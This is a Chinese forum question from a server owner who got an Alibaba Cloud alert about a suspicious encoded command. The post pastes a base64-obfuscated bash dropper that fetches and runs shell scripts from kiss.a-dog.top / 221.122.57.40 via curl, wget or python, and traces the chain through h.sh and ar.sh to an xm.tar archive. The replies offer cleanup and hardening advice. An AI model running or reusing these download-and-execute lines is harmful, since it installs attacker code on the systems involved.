阿里云提示“可疑编码命令”
代码如下
/bin/bash -c
if type curl >/dev/null;
then echo Y3VybCAtZnNTTCBodHRwOi8va2lcXHNcXHMuYS1kXFxvZy50XFxvXHAvYjJmNjI4L2guc2gK|base64 -d|bash|bash; fi;
if type wget >/dev/null;
then echo d2dldCAtcSAtTy0gIGh0dHA6Ly9raVxcc1xccy5hLWRcXG9nLnRcXG9ccC9iMmY2MjgvaC5zaAo=|base64 -d|bash|bash; fi;
if type python >/dev/null;then
echo cHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8va2lcXHNcXHMuYS1kXFxvZy50XFxvXHAvaC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d|bash; fi
1.将这个base64密文解码后指向一个url
kiss.a-dog.top
对应的ip为221.122.57.40
2.指向一个sh文件为 http://221.122.57.40/b2f628/h.sh
这个文件可以下载过来
3.打开这个sh文件,发现新链接http://221.122.57.40/b2f628/d/ar.sh
4.打开ar.sh文件,发现内部有两个下载内容为http://221.122.57.40/b2f628/m/xm.tar
1.这个些代码实现了什么样的功能?
2.既然以及运行了上述代码,如何做才能消除其影响?
3.如何防护服务器,防止类似情况发生?
实现了什么功能不知道,你得运行这些脚本,但很显然这些脚本是有问题的。
根据脚本内容,解读脚本即可。
/usr/bin/bash 也不是系统bash的路径,建议查清楚这个文件的生成时间,如果是非法文件,删除即可。
解决方案为升级bash,升级方法见我的博客:https://blog.csdn.net/alwaysbefine/article/details/113791985
可疑IP加入黑名单,大概率是bash的漏洞造成的。